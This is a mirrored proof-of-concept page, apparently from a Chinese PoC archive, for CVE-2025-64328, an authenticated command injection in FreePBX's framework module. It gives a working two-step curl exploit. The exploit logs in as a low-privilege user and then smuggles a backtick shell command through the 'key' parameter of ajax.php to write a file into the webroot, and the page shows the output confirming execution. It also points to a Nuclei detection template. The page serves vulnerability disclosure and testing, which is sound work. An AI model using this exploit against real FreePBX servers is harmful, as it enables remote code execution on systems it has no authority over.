关联漏洞
Description
CVE-2025-64328 FreePBX Authenticated Command Injection in the framework module.
介绍
# CVE-2025-64328 FreePBX Authenticated Command Injection in `framework` module
Simple proof of concept repository for CVE-2025-64328 FreePBX Authenticated Command Injection in the `framework` module.
Full writeup here: https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/
## `curl` proof of concept
```
$ curl -s \
-XPOST --cookie-jar /tmp/freepbx-cookie --data 'username=lowprivuser&password=<lowprivuserpassword>' http://192.168.122.206/admin/config.php -o /dev/null \
--next \
--cookie /tmp/freepbx-cookie -H 'Referer: http://192.168.122.206' 'http://192.168.122.206/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=asdf&port=22&key=asdf`echo%20rcetest2>/var/www/html/rcetest.txt`&path=test' | jq
{
"status": true,
"message": "Login failed"
}
$ curl -sk http://192.168.122.206/rcetest.txt
rcetest2
```
## Nuclei template:
[CVE-2025-64328.yaml](./CVE-2025-64328.yaml)
文件快照
[4.0K] /data/pocs/7ab9202fc269988b154a2d2ee67fe76c748c28ea
├── [2.2K] CVE-2025-64328.yaml
└── [ 939] README.md
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。